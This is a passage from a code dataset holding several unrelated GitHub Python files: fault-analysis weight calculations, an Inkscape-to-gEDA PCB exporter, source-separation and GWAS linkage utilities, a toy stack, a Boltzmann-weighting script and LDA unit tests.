mis_thisvar_absolute), axis=1\n )\n\n # Write all the auxiliary weight data\n # Generate and store report files according to each method\n (\n auxdata_thisvar_directional,\n auxdata_thisvar_absolute,\n ) = weightcalculator.report(\n weightcalcdata,\n causevarindex,\n affectedvarindex,\n weightlist,\n box,\n proplist,\n milist,\n )\n\n auxdata_directional.append(auxdata_thisvar_directional)\n auxdata_absolute.append(auxdata_thisvar_absolute)\n\n # Do the same for the significance threshold\n if weightcalcdata.allthresh:\n sigthreshlist = [\n directional_sigthreshlist,\n absolute_sigthreshlist,\n ]\n\n sigthresh_thisvar_directional = np.asarray(\n sigthreshlist[0]\n )\n sigthresh_thisvar_directional = sigthresh_thisvar_directional[\n :, np.newaxis\n ]\n\n datalines_sigthresh_directional = np.concatenate(\n (\n datalines_sigthresh_directional,\n sigthresh_thisvar_directional,\n ),\n axis=1,\n )\n\n sigthresh_thisvar_absolute = np.asarray(sigthreshlist[1])\n sigthresh_thisvar_absolute = sigthresh_thisvar_absolute[\n :, np.newaxis\n ]\n\n datalines_sigthresh_absolute = np.concatenate(\n (\n datalines_sigthresh_absolute,\n sigthresh_thisvar_absolute,\n ),\n axis=1,\n )\n\n else:\n\n twodimensions = False\n\n weights_thisvar_neutral = np.asarray(weightlist)\n weights_thisvar_neutral = weights_thisvar_neutral[\n :, np.newaxis\n ]\n\n datalines_neutral = np.concatenate(\n (datalines_neutral, weights_thisvar_neutral), axis=1\n )\n\n # Write all the auxilliary weight data\n # Generate and store report files according to each method\n proplist = None\n\n auxdata_thisvar_neutral = weightcalculator.report(\n weightcalcdata,\n causevarindex,\n affectedvarindex,\n weightlist,\n box,\n proplist,\n )\n\n auxdata_neutral.append(auxdata_thisvar_neutral)\n\n # Write the significance thresholds to file\n if weightcalcdata.allthresh:\n sigthresh_thisvar_neutral = np.asarray(sigthreshlist)\n sigthresh_thisvar_neutral = sigthresh_thisvar_neutral[\n :, np.newaxis\n ]\n\n datalines_sigthresh_neutral = np.concatenate(\n (\n datalines_sigthresh_neutral,\n sigthresh_thisvar_neutral,\n ),\n axis=1,\n )\n\n if (\n not (newconnectionmatrix[affectedvarindex, causevarindex] == 0)\n and (exists is False)\n and (writeoutput is True)\n ):\n\n if twodimensions:\n writecsv_weightcalc(\n filename(directional_name, boxindex + 1, causevar),\n datalines_directional,\n headerline,\n )\n\n writecsv_weightcalc(\n filename(absolute_name, boxindex + 1, causevar),\n datalines_absolute,\n headerline,\n )\n\n # Write mutual information over multiple delays to file just as for transfer entropy\n writecsv_weightcalc(\n filename(mis_directional_name, boxindex + 1, causevar),\n mis_datalines_directional,\n headerline,\n )\n\n writecsv_weightcalc(\n filename(mis_absolute_name, boxindex + 1, causevar),\n mis_datalines_absolute,\n headerline,\n )\n\n writecsv_weightcalc(\n filename(auxdirectional_name, boxindex + 1, causevar),\n auxdata_directional,\n weightcalculator.data_header,\n )\n\n writecsv_weightcalc(\n filename(auxabsolute_name, boxindex + 1, causevar),\n auxdata_absolute,\n weightcalculator.data_header,\n )\n\n if weightcalcdata.allthresh:\n writecsv_weightcalc(\n filename(sig_directional_name, boxindex + 1, causevar),\n datalines_sigthresh_directional,\n headerline,\n )\n\n writecsv_weightcalc(\n filename(sig_absolute_name, boxindex + 1, causevar),\n datalines_sigthresh_absolute,\n headerline,\n )\n\n else:\n writecsv_weightcalc(\n filename(neutral_name, boxindex + 1, causevar),\n datalines_neutral,\n headerline,\n )\n\n writecsv_weightcalc(\n filename(auxneutral_name, boxindex + 1, causevar),\n auxdata_neutral,\n weightcalculator.data_header,\n )\n\n if weightcalcdata.allthresh:\n writecsv_weightcalc(\n filename(sig_neutral_name, boxindex + 1, causevar),\n datalines_sigthresh_neutral,\n headerline,\n )\n\n print(\n \"Done analysing causal variable: \"\n + causevar\n + \" [\"\n + str(causevarindex + 1)\n + \"/\"\n + str(len(weightcalcdata.causevarindexes))\n + \"]\"\n )\n\n return None\n\n\ndef run(non_iter_args, do_multiprocessing):\n [\n weightcalcdata,\n weightcalculator,\n box,\n startindex,\n size,\n newconnectionmatrix,\n method,\n boxindex,\n filename,\n headerline,\n writeoutput,\n ] = non_iter_args\n\n partial_gaincalc_oneset = partial(\n calc_weights_oneset,\n weightcalcdata,\n weightcalculator,\n box,\n startindex,\n size,\n newconnectionmatrix,\n method,\n boxindex,\n filename,\n headerline,\n writeoutput,\n )\n\n if do_multiprocessing:\n pool = Pool(processes=pathos.multiprocessing.cpu_count())\n pool.map(partial_gaincalc_oneset, weightcalcdata.causevarindexes)\n\n # Current solution to no close and join methods on ProcessingPool\n # https://github.com/uqfoundation/pathos/issues/46\n\n s = pathos.multiprocessing.__STATE[\"pool\"]\n s.close()\n s.join()\n pathos.multiprocessing.__STATE[\"pool\"] = None\n\n else:\n for causevarindex in weightcalcdata.causevarindexes:\n partial_gaincalc_oneset(causevarindex)\n\n return None\n","repo_name":"sjstreicher/FaultMap","sub_path":"faultmap/gaincalc_oneset.py","file_name":"gaincalc_oneset.py","file_ext":"py","file_size_in_byte":18198,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"77"} +{"seq_id":"72218395449","text":"import inkex\nfrom inkex.paths import CubicSuperPath, Path\nfrom inkex.transforms import Transform\nfrom inkex.bezier import cspsubdiv\n\nclass MyEffect(inkex.EffectExtension):\n\n header = \"Element[\\\"\\\" \\\"InkscapeExportedElement\\\" \\\"\\\" \\\"\\\" 0 0 -10000 -10000 0 100 \\\"\\\"] # header stub\\n(\\n\"\n footer = \") # footer stub\\n\"\n\n def add_arguments(self, pars):\n pars.add_argument(\"--flatness\",\n dest=\"flat\",\n type=float, \n default=0.2,\n help=\"Minimum flatness of the subdivided curves\")\n pars.add_argument(\"-m\", \"--mirror\",\n type=inkex.Boolean, \n dest=\"mirror\", default=\"FALSE\",\n help=\"Mirror Y-Axis\")\n pars.add_argument(\"-x\", \"--xOrigin\",\n type=float, \n dest=\"xOrigin\", default=0.0,\n help=\"X Origin (pixels)\")\n pars.add_argument(\"-y\", \"--yOrigin\",\n type=float, \n dest=\"yOrigin\", default=0.0,\n help=\"Y Origin (pixels)\")\n pars.add_argument(\"-s\", \"--scaling\",\n type=int, \n dest=\"scaling\", default=1.0,\n help=\"Scaling\")\n pars.add_argument(\"-t\", \"--thickness\",\n type=int,\n dest=\"thickness\", default=8,\n help=\"Line thickness (mil/thou)\")\n pars.add_argument(\"-p\", \"--plotInvisibleLayers\",\n type=inkex.Boolean, \n dest=\"plotInvisibleLayers\", default=\"FALSE\",\n help=\"Plot invisible layers\")\n\n def process_path(self, node, transform):\n path = node.path.to_absolute()\\\n .transform(node.composed_transform())\\\n .transform(transform)\\\n .to_superpath()\n if path:\n cspsubdiv(path, self.options.flat)\n # path to HPGL commands\n first = True\n oldPosX = -1\n oldPosY = -1\n for singlePath in path:\n for singlePathPoint in singlePath:\n posX, posY = singlePathPoint[1]\n # check if point is repeating, if so, ignore\n if not first:\n self.fp.append('\\tElementLine(%d %d %d %d %d)\\n' % (oldPosX,oldPosY,posX,posY,self.options.thickness))\n oldPosX = posX\n oldPosY = posY\n first = False\n\n def process_group(self, group):\n \"\"\"flatten layers and groups to avoid recursion\"\"\"\n for child in group:\n if not isinstance(child, inkex.ShapeElement):\n continue\n if child.is_visible():\n if isinstance(child, inkex.Group):\n self.process_group(child)\n elif isinstance(child, inkex.PathElement):\n self.process_path(child, Transform(self.groupmat))\n\n def save(self, stream):\n stream.write(''.join(self.fp).encode('utf-8'))\n\n def effect(self):\n self.fp = ['# gEDA PCB footprint exported from Inkscape\\n']\n self.fp.append(self.header)\n x0 = self.options.xOrigin\n y0 = self.options.yOrigin\n scale = float(self.options.scaling)\n self.options.flat *= scale\n mirror = 1.0\n if self.options.mirror:\n mirror = -1.0\n if self.svg.unittouu(self.document.getroot().xpath('@height', namespaces=inkex.NSS)[0]):\n y0 -= float(self.svg.unittouu(self.document.getroot().xpath('@height', namespaces=inkex.NSS)[0]))\n self.groupmat = [[scale, 0.0, 0.0], [0.0, mirror*scale, 0.0]]\n doc = self.document.getroot()\n self.process_group(doc)\n self.fp.append(self.footer)\n\nif __name__ == '__main__': #pragma: no cover\n MyEffect().run()\n\n# vim: expandtab shiftwidth=4 tabstop=8 softtabstop=4 encoding=utf-8 textwidth=99\n","repo_name":"erichVK5/inkscape2pcb","sub_path":"geda_pcb_output.py","file_name":"geda_pcb_output.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"22562382466","text":"from pathlib import Path\nfrom typing import Tuple\n\nimport torch\nfrom hydra.core.config_store import ConfigStore\n\nfrom modules import VectorQuantizedVAE\n\n# useful paths\nROOT_DIR = Path(__file__).parent.parent\nCONFIG_DIR = ROOT_DIR / \"configs\"\n\n# singleton objects\nCONFIG_STORE = ConfigStore.instance()\n\n\ndef refine_latents(\n model: VectorQuantizedVAE,\n latents_1: torch.Tensor,\n latents_2: torch.Tensor,\n mixtures: torch.Tensor,\n n_iterations: int = 2000,\n learning_rate: float = 1e-3,\n regularizer_coeff: float = 1e-3,\n) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Refine latent codes for better separation.\n\n The refinment operation uses Adam to optimize the latent vectors in input\n so that their mixture is\n\n Args:\n model: vq-vae model\n latents_1: separation latent codes. Shape (batch size, ...)\n latents_2: separation latent codes. Shape (batch size, ...)\n mixtures: mixtures. (batch size, ...)\n n_iterations: number of iterations of the optimization procedure\n learning_rate: learning rate to iuse\n regularizer_coeff: coefficient used for regularization\n\n Returns:\n The two separated signals.\n \"\"\"\n # DO NOT REMOVE: necessary, although not sure why\n latents_1 = torch.stack([latents_1], 0).squeeze(0)\n latents_2 = torch.stack([latents_2], 0).squeeze(0)\n\n # copy initial values\n gen1 = latents_1.clone().detach().requires_grad_(True)\n gen2 = latents_2.clone().detach().requires_grad_(True)\n latents_1 = latents_1.clone().detach()\n latents_2 = latents_2.clone().detach()\n mixtures = mixtures.clone().detach()\n\n optimizer = torch.optim.Adam([gen1, gen2], lr=learning_rate)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 100, 0.5)\n\n # optimize\n for s in range(n_iterations):\n geni1 = model.decode_latents(gen1)\n geni2 = model.decode_latents(gen2)\n geni_mixtures = (geni1 + geni2) / 2.0\n\n reg = regularizer_coeff * torch.mean((gen1 - latents_1) ** 2 + (gen2 - latents_2) ** 2)\n loss = torch.mean((geni_mixtures - mixtures).pow(2)) + reg\n loss.backward()\n\n optimizer.step()\n scheduler.step()\n optimizer.zero_grad()\n\n return geni1, geni2\n","repo_name":"gladia-research-group/latent-autoregressive-source-separation","sub_path":"lass_mnist/lass/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"77"} +{"seq_id":"43439515456","text":"#The purpose of this code is to annotate all the SNPs that are in high LD with the sQTLs we identified (only SNPs annotated in GWAS catalog AND in high LD with sQTLs are outputted)\n\n## inputs gwas catalog and plink ld output \nimport sys,os,re\nfrom collections import defaultdict\n\ndef read_in_plink(plink_fn): #the purpose of this function is to pair our SNP with SNPs in high LD with our SNP and get the r square of this pair\n plink_in = open(plink_fn,'r')\n firstline = True\n ld={} #dictionary with key=SNP pair and key=r square value of this pair\n p = defaultdict(list) #dictionary with value=SNP in our result and key=SNPs that are in high LD with our SNPs\n for line in plink_in: \n if firstline: #skip the first line\n firstline = False\n continue\n fields = line.rstrip().split()\n p[fields[5]].append(fields[2]) #fields[2] is the SNP in our result and fields[5] is the SNPs that are in high LD with our SNPs\n ld[fields[5]+'\\t'+fields[2]]=fields[6]\n plink_in.close()\n return p,ld\n\ndef main():\n gwas_fn = sys.argv[2]\n plink_fn = sys.argv[1]\n plink_dict,ld = read_in_plink(plink_fn)\n fout=open(plink_fn+'.LD.result.txt','w')\n gwas_dict = {} #dictionary with key=SNPs that are in high LD with our SNP and value=GWAS catelog information of that SNP\n firstline = True\n gwas_in = open(gwas_fn)\n for line in gwas_in:\n if firstline: #skip the first line\n firstline = False\n continue\n fields = line.rstrip().split('\\t')\n if fields[21] in plink_dict: #if the SNP in GWAS catalog is one of the SNPs that are in high LD with our SNP\n \tif fields[21] in gwas_dict: #if we have already have this SNP in our result (one SNP can appear in different rows in the GWAS catalog BUT the annotation can be different, so we keep them all)\n \t\tgwas_dict[fields[21]] = [m+';'+n for m,n in zip(gwas_dict[fields[21]],fields)]\n \tif fields[21] not in gwas_dict:\n \t\tgwas_dict[fields[21]] = fields #we add the information of that SNP into our result\n gwas_in.close()\n for snp in gwas_dict: #for each SNP that is (1) in GWAS catalog and (2) in high LD with our SNP\n for s in plink_dict[snp]: #get the SNPs in our result that pairs with snp from the previous step\n r_2=''\n if s+'\\t'+snp in ld: #if the pair is in this order\n r_2=ld[s+'\\t'+snp] #get the r square\n else: #if the pair is in the reverse order\n r_2=ld[snp+'\\t'+s] #get the r square\n #print s, '\\t', snp, '\\t',gwas_dict[snp][7], '\\t',gwas_dict[snp][34],'\\t',gwas_dict[snp][27], '\\t',gwas_dict[snp][1],'\\t',r_2\n fout.write('{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\t{6}\\n'.format(s, snp,gwas_dict[snp][7],gwas_dict[snp][34],gwas_dict[snp][27],gwas_dict[snp][1],r_2))\n\nif __name__ == '__main__':\n main()\n","repo_name":"Xinglab/GTEx-brain-sQTL","sub_path":"09_sQTL_analysis/03_sQTL_calculation/8_gwas_linkage_NHGRI.py","file_name":"8_gwas_linkage_NHGRI.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"19048058821","text":"class node:\r\n def __init__(self,nextnode,val):\r\n \r\n self.nextnode=nextnode\r\n self.val=val\r\n\r\nclass stack:\r\n def __init__(self,top,size):\r\n \r\n self.top=top\r\n self.size=size\r\n \r\n def push(self,value):\r\n \r\n n=node(None,value)\r\n n.nextnode=self.top\r\n self.top=n\r\n self.size+=1\r\n\r\n def pop(self):\r\n \r\n if(self.top==None):return None\r\n n=self.top\r\n self.top=n.nextnode\r\n self.size-=1\r\n return n\r\n\r\n def peek(self):\r\n if(self.top==None):return None\r\n return self.top.val\r\n\r\nletters=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\r\nstring=str(input(\"Give a string to find it's reverse\\n\"))\r\nprint(string,'\\n')\r\n\r\nS=stack(None,0)\r\n\r\nfor i in range(len(string)):\r\n S.push(string[i])\r\n print(S.peek())\r\n \r\nprint(\"\\n\\n\")\r\n\r\nfor i in range(len(string)):\r\n print(S.pop().val)\r\n \r\n","repo_name":"Vikhyat2603/Old-Stuff","sub_path":"Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20259279672","text":"import json\nimport torch\n\n\n\ndef build_optimizer_parameters(config, model):\n\n param_optimizer = list(model.named_parameters())\n param_optimizer = [n for n in param_optimizer if 'pooler' not in n[0]]\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight', 'pos_embed','relative_position_bias_table']\n\n if \"weight_decay\" in config.TRAINING.keys():\n weight_decay = config.TRAINING[\"weight_decay\"]\n else:\n weight_decay = 0.01\n\n\n optimizer_grouped_parameters = [{\n 'params': [\n p for n, p in param_optimizer\n if not any(nd in n for nd in no_decay) and p.requires_grad\n ],\n 'weight_decay':\n weight_decay\n }, {\n 'params':\n [p for n, p in param_optimizer if any(nd in n for nd in no_decay) and p.requires_grad],\n 'weight_decay':\n 0.0\n }]\n \n return optimizer_grouped_parameters","repo_name":"microsoft/XPretrain","sub_path":"LF-VILA/src/optimization/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":369,"dataset":"github-code","pt":"77"} +{"seq_id":"71893790970","text":"\nimport os\nimport sys\nimport numpy as np\nfrom scipy.special import softmax\n\n\n#cutoff_coord = float(sys.argv[1])\n\nclass BOLTZMANN:\n def __init__(self):\n #self.cutoff = cutoff \n self.ranked_path = 'ranked'\n\n def GET_COORD_NO(self, rank_w_energy, cutoff):\n output_clusters = [os.path.join('ranked', str(x)) for x in rank_w_energy.keys()]\n output_clusters.sort()\n cluster_mean_coord_no = {}\n for i in output_clusters:\n geometry_file = os.path.join(i, 'geometry.in')\n geometry_next_file = os.path.join(i, 'geometry.in.next_step')\n if os.path.exists(geometry_next_file):\n with open(geometry_next_file, 'r') as f:\n geo = [x for x in f.readlines() if 'atom' in x]\n elif os.path.exists(geometry_file):\n with open(geometry_file, 'r') as f:\n geo = [x for x in f.readlines() if 'atom' in x]\n\n geo = [x.split() for x in geo]\n geo_array = np.array(geo)[:, 1:4].astype(float)\n atom_array = np.array(geo)[:, 4:].ravel()\n matching_indicies_cat = np.where(atom_array == 'Al')[0]\n matching_indicies_an = np.where(atom_array == 'F')[0]\n\n coord_no = 0\n for j in matching_indicies_cat:\n for k in matching_indicies_an:\n dist = np.linalg.norm(geo_array[j] - geo_array[k])\n if dist < cutoff:\n coord_no += 1\n cluster_mean_coord_no[i] = coord_no/len(matching_indicies_cat)\n return cluster_mean_coord_no\n\n\n\n def GET_DFT_ENERGY(self):\n output_clusters = [os.path.join(self.ranked_path, x, 'aims.out') for x in os.listdir(self.ranked_path) \\\n if x.isdigit() if os.path.exists(os.path.join(self.ranked_path, x, 'aims.out')) \\\n if os.path.isdir(os.path.join(self.ranked_path, x))]\n\n output_clusters = sorted(output_clusters, key=lambda x: int(x.split('/')[1]))\n\n IP_order_rank_w_energy = {}\n for i in output_clusters[:300]:\n with open(i, 'r') as f:\n contents = f.readlines()[-200:]\n energy = float([x for x in contents if '| Total energy of the DFT / Hartree-Fock s.c.f. calculation :' in x][0].split()[-2])\n IP_order_rank_w_energy[str(i.split('/')[-2])] = energy\n\n DFT_order_rank_w_energy = sorted(IP_order_rank_w_energy.items(), key=lambda item: item[1])\n DFT_order_rank_w_energy = dict(DFT_order_rank_w_energy)\n\n check_loc = [x for x in os.listdir('./') if x == 'boltzmann' if os.path.isdir(x)]\n if len(check_loc) == 0:\n os.mkdir('boltzmann')\n else: pass\n\n with open(f'boltzmann/aims_rank.txt', 'w') as f:\n for k, v in DFT_order_rank_w_energy.items():\n f.write(f\"{k}, {v}\")\n return DFT_order_rank_w_energy, IP_order_rank_w_energy\n\n\n\n def BOLTZMANN_WEIGHT(self, coord_dict, energy_dict, cutoff):\n\n # up to DFT rank 300\n COORD_values = list(coord_dict.values())[:300]\n E_values_eV = list(energy_dict.values())[:300] \n\n # Convert energies from eV to Joules\n eV_to_J = 1.602176634e-19 # Conversion factor from eV to Joules\n E_values = [E * eV_to_J for E in E_values_eV]\n \n # Set the Boltzmann constant and temperature\n k_B = 1.380649e-23 # Boltzmann constant (in J/K)\n T = 300 \n #T = 273.15 + 110 # Temperature (in Kelvin)\n \n # Subtract the minimum energy from all energy values\n E_min = min(E_values)\n E_shifted = np.array(E_values) - E_min # delta E\n \n # Calculate the Boltzmann weights for each energy value (partition function)\n energies_divided_by_kT = -E_shifted / (k_B * T)\n exp_values = np.exp(energies_divided_by_kT) # Boltzmann function\n partition_function = np.sum(exp_values) # partition function (Z)\n \n #boltzmann_weights of coordination no = COORD_values * exp_values / Z \n boltzmann_weights = COORD_values * exp_values / partition_function \n mean_boltzmann_weights = np.sum(COORD_values * exp_values) / partition_function\n\n #print(\"Boltzmann weights:\", boltzmann_weights)\n list_boltzmann_weights = [str(x) for x in boltzmann_weights.tolist()]\n\n check_loc = [x for x in os.listdir('./') if x == 'boltzmann' if os.path.isdir(x)]\n if len(check_loc) == 0:\n os.mkdir('boltzmann')\n else: pass\n\n with open(f'boltzmann/boltzmann_weights_{cutoff}.txt', 'w') as f:\n f.write(f'{cutoff}\\n')\n f.write(str(mean_boltzmann_weights.tolist()) + '\\n\\n')\n f.write('boltzmann_weights')\n for i in list_boltzmann_weights:\n f.write('\\n'+i)\n return boltzmann_weights, mean_boltzmann_weights\n\n\nif __name__ == \"__main__\":\n BOLTZMANN = BOLTZMANN()\n rank_w_energy = BOLTZMANN.GET_DFT_ENERGY() # rank_w_energy[0] = DFT_order_rank_w_energy, ~[1] = IP_order\n for i in np.arange(1.7, 3.1, 0.1): # cutoff distance in every 0.1 Ang from 1.7 Ang to 3.0 Ang\n i = np.round(i, 1)\n print(i)\n cluster_mean_coord_no = BOLTZMANN.GET_COORD_NO(rank_w_energy[0], i)\n boltzmann_weights, mean_boltzmann_weights = BOLTZMANN.BOLTZMANN_WEIGHT(cluster_mean_coord_no, rank_w_energy[0], i)\n print(f\"cutoff distance: {i} Ang\")\n print(f\"DFT energy order: {rank_w_energy[0]}\")\n print(f\"Average Al atom coordination number: {cluster_mean_coord_no}\")\n print(f\"Boltzmann weight: {boltzmann_weights}\")\n print(f\"Mean Boltzmann weight: {mean_boltzmann_weights}\")\n","repo_name":"DGKang234/PhD_tool","sub_path":"aims_auto/boltzmann_coord.py","file_name":"boltzmann_coord.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28589284378","text":"def main():\n greeting = input(\"Greeting: \").strip()\n money = value(greeting)\n print(money)\n\ndef value(greeting):\n if (\"Hello\".casefold() in greeting.casefold()):\n return 0\n elif (greeting[0].casefold() == \"H\".casefold()):\n return 20\n else:\n return 100\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mfdestiny/root","sub_path":"coursework/cs50/CS50P/test_bank/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22520894477","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom typing import List, Optional\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def numComponents(self, head: Optional[ListNode], nums: List[int]) -> int:\n nums = set(nums)\n p = head\n ans = 0\n while p is not None:\n if p.val in nums:\n ans += 1\n while p is not None and p.val in nums:\n p = p.next\n else:\n p = p.next\n\n return ans","repo_name":"ftakanashi/JobProjects","sub_path":"LeetCode/817.链表组件/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"73596352887","text":"import unittest\nimport os\nimport warnings\n\nimport numpy as np\nfrom numpy.random import default_rng\n\nfrom scipy.spatial import distance_matrix\nfrom scipy.optimize import linear_sum_assignment\nfrom scipy import stats\n\nfrom lda.lda import TensorDecompositionLDA\n\nimport matplotlib.pyplot as plt\n\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom wordcloud import WordCloud\n\nfrom config import Config \nlogging = Config.logging\n\ndef topicRecoveryError( Beta, PhiGrnd ):\n\t\"\"\"\n\t\tParameters:\n\t\t-----------\n\t\tBeta - a d x k matrix of estimated word distributions for each of the k topics\n\t\tPhiGrnd - a d x k matrix of the true word distributions for each topic\n\n\t\tReturns:\n\t\t--------\n\t\terror - a scalar representing the recovery error of the estimated Beta with respect to the ground truth\n\t\"\"\"\n\t# compute the full pairwise L1 distance between\n\t# the ground beta and the estimated Beta\n\tcost = distance_matrix( Beta.T, PhiGrnd.T, p=1 )\n\t# construct a bipartite graph with negative L1 distances as edge weights\n\t# and solve the linear assignment problem to match estimated topics\n\t# with ground truth topics\n\trow_ind, col_ind = linear_sum_assignment( cost )\n\t# average the k L1 distances between matched pairs to compute the error\n\treturn np.average( cost[ row_ind, col_ind ] )\n\n\nclass TestTensorDecompositionLDA( unittest.TestCase ):\n\tdef setUp( self ):\n\t\tself.rng = default_rng( 12018231 )\n\t\tself.assetpath = os.path.join( os.getcwd(), 'tests/assets' )\n\n\tdef testTensorDecompositionLDA( self ):\n\t\t# pick the number of topics to infer\n\t\tk = 50\n\t\t# pick the size of the corpus\n\t\tnum_documents = self.rng.integers( 100, 200 )\n\t\t# pick the size of the vocabulary\n\t\tnum_words = 500\n\t\t# pick model parameter alpha0\n\t\talpha0 = 1.\n\t\t# create the corpus as a word frequency matrix\n\t\tC = self.rng.integers( 0, 3, size=( num_words, num_documents ) )\n\t\t# create tensor LDA with default arguments\n\t\tTLDA = TensorDecompositionLDA( k, alpha0 )\n\t\t# train\n\t\talphas, Phi = TLDA.fit( C )\n\t\t# the alphas should sum to alpha0\n\t\tself.assertEqual( ( num_words, k ), Phi.shape )\n\t\t# each column of Phi should be a distribution over words representing a topic\n\t\tnp.testing.assert_array_almost_equal( np.ones( k ), np.sum( Phi, axis=0 ) )\n\t\tself.assertAlmostEqual( alpha0, np.sum( alphas ) )\n\n\tdef testTDLDAInference( self ):\n\t\t\"\"\"\n\t\t\tEvaluation using synthetic data from Wang et.al. 2014\n\t\t\"\"\"\n\t\tk = 50\t# the number of topics\n\t\tV = 3000 # the size of the vocabulary\n\t\teta = 100 # the Poisson distribution parameter for drawing document lengths\n\t\talpha = 1./k * np.ones( k ) # the Dirichlet parameters for drawing topic distributions\n\t\tBeta = 200./V * np.ones( shape=( V, k ) ) # the Dirichlet parameters for drawing conditional word distributions\n\t\tD = 5000 # number of documents to generate\n\t\tPhiBase = np.tile( 1./V * np.ones( V ), ( k, 1 ) ).T # uniform distribution as baseline\n\n\t\titers = 5\n\t\tbaseline_errors = []\n\t\ttdlda_errors = []\n\t\tslda_errors = []\n\n\t\tfor t in range( iters ):\n\t\t\t# generate the synthetic corpus and get the true Beta\n\t\t\tC, PhiGrnd = TensorDecompositionLDA.sample( eta, alpha, Beta, k, D)\n\t\t\t# run the inference algorithm\n\t\t\tTLDA = TensorDecompositionLDA( k, np.sum( alpha ) )\n\t\t\talphas, Phi = TLDA.fit( C )\n\t\t\t# compute the error\n\t\t\ttdlda_errors.append( topicRecoveryError( Phi, PhiGrnd ) )\n\t\t\tbaseline_errors.append( topicRecoveryError( PhiBase, PhiGrnd ) )\n\n\t\t# compute error stats\n\t\tS = stats.describe( tdlda_errors )\n\t\tS_baseline = stats.describe( baseline_errors )\n\t\t# we should be doing better than random!!\n\t\tself.assertLess( S.mean, S_baseline.mean )\n\t\t\n\t\t# plot the stats\n\t\tfig, ax = plt.subplots()\n\t\tx_pos = np.arange( 2 )\n\t\tax.bar( x_pos, [ S.mean, S_baseline.mean ], yerr=[ np.sqrt( S.variance ), np.sqrt( S_baseline.variance ) ], align='center', alpha=0.5, ecolor='black', capsize=10)\n\t\tax.set_ylabel( '$L_1$ error' )\n\t\tax.set_xticks( x_pos )\n\t\tax.set_xticklabels( [ 'TDLDA', 'Uniform' ] )\n\t\tax.yaxis.grid( True )\n\n\t\t# Save the figure and show\n\t\tplt.tight_layout()\n\t\tplt.title( 'Topic Recover Error' )\n\t\tplt.savefig( 'topic_recovery_error.png' )\n\n\n\tdef testTLDANYTDataset( self ):\n\t\t# create the vocabulary map\n\t\tvocab_file = 'nyt_vocab.dat.txt'\n\t\tcorpus_file = 'nyt_data.txt'\n\t\tV = []\n\t\tfreqs = []\n\t\t# read in the vocabulary \n\t\twith open( os.path.join( self.assetpath, vocab_file ) ) as f:\n\t\t\tV = f.readlines()\n\t\tV = [ w.strip().strip( '\\n' ).strip( '\\'' ) for w in V if w != '' ]\n\t\t# read in the articles: each article is a line of comma-separated\n\t\t# pairs of word index and frequency\n\t\twith open( os.path.join( self.assetpath, corpus_file ) ) as f:\n\t\t\tfreqs = f.readlines()\n\t\tfreqs = [ d.strip().strip( '\\n' ).strip( '\\'' ) for d in freqs if d != '' ]\n\t\tC = np.zeros( ( len( V ), len( freqs ) ) )\n\t\tnum_words, num_docs = C.shape\n\t\t# utility to split each index:count pair from the frequencies file\n\t\tpair = lambda x: tuple( [ int( p ) for p in x.split( ':' ) ] )\n\t\t# build the corpus as a num_words x num_docs matrix of word counts\n\t\tfor j in range( num_docs ):\n\t\t\tpairs = [ pair( x ) for x in freqs[j].split( ',' ) ]\n\t\t\tfor ( w, count ) in pairs:\n\t\t\t\tC[w-1, j] = count \n\t\tnum_test_docs = 20\n\t\t# split into training set and test set\n\t\ttrain_set = C[:, :-num_test_docs]\n\t\ttest_set = C[:, -num_test_docs:]\n\n\t\t# fit the model\n\t\tk = 10\n\t\talpha0 = 1.\n\t\tTLDA = TensorDecompositionLDA( k, alpha0 )\n\t\talphas, Phi = TLDA.fit( train_set )\n\t\t# show the top words for each topic\n\t\ttopics = TLDA.topic_words( 5 )\n\t\t# map indices back to words for readability\n\t\tfor k, v in topics.items():\n\t\t\tlogging.info ( f'{k}, {[ ( V[idx], p ) for ( idx, p ) in v ]}' )\n\n\t\t# get the topic distributions for the test docs\n\t\tdoc_topics = TLDA.doc_topics( test_set )\n\t\tidx = 0\n\t\tfor k, v in doc_topics.items():\n\t\t\tlogging.info ( f'The most probable topic for this document is {np.argmax( v )}' )\n\t\t\tdoc = test_set[:, idx]\n\t\t\t# show original test document words gathered from the frequency matrix\n\t\t\tlogging.info ( f'Tokens from original article: {[ V[j] for j in range( len( doc ) ) if doc[j] > 0 ]}\\n\\n' )\n\t\t\tidx += 1\n\n\t\tdoc_topics_as_matrix = np.array( [ dist for dist in doc_topics.values() ] )\n\t\tnp.testing.assert_array_almost_equal( np.ones( num_test_docs ), np.sum( doc_topics_as_matrix, axis=1 ) )\n\n\tdef testTLDA20ng( self ):\n\t\tnews = fetch_20newsgroups( subset='all' )\n\t\tvectorizer = CountVectorizer( max_df=0.5, 